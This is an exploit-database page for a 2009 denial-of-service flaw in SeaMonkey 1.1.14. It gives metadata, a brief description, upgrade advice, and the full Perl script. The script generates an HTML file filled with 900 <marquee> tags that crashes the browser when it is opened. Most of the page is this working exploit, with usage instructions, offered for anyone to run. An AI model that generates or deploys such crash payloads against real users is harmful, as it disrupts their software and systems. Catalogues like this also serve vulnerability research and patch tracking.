SeaMonkey - exploit.company

vendor:

SeaMonkey

by:

athos

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: SeaMonkey

Affected Version From: 1.1.14

Affected Version To: 1.1.14

Patch Exists: YES

Related CWE: N/A

CPE: a:seamonkey:seamonkey

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 8.10, Slackware 12.2

2009

SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit

SeaMonkey <= 1.1.14 is vulnerable to a Denial of Service attack when a maliciously crafted HTML file is opened. The exploit creates an HTML file with a large number of <marquee> tags, which causes the browser to crash when the file is opened.

Mitigation:

Upgrade to the latest version of SeaMonkey.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit
# by athos - staker[at]hotmail[dot]it
# tested on ubuntu 8.10 / slackware 12.2
# thanks to SirDark because he has tested on slackware

my $data = undef;
my $file = shift or &usage;

exploit();

sub exploit {

   $data .= "<html><head><title>";
   $data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit";
   $data .= "</title></head><body>";
   $data .= "<marquee>" x900;
   $data .= "</body></html>";

   open(FILE,'>',$file) or die('file error');
   print FILE $data;
   close(FILE);
}


sub usage {
    
   print "\n+---------------------------------------------------------+\r".
         "\n| SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |\r".
         "\n+---------------------------------------------------------+\r".
         "\nby athos - staker[at]hotmail[dot]it\n".
         "\nUsage\n".
         "\rperl $0 [file name]\n".
         "\rperl $0 crash.html\n";
   exit;      
}    

# milw0rm.com [2009-01-06]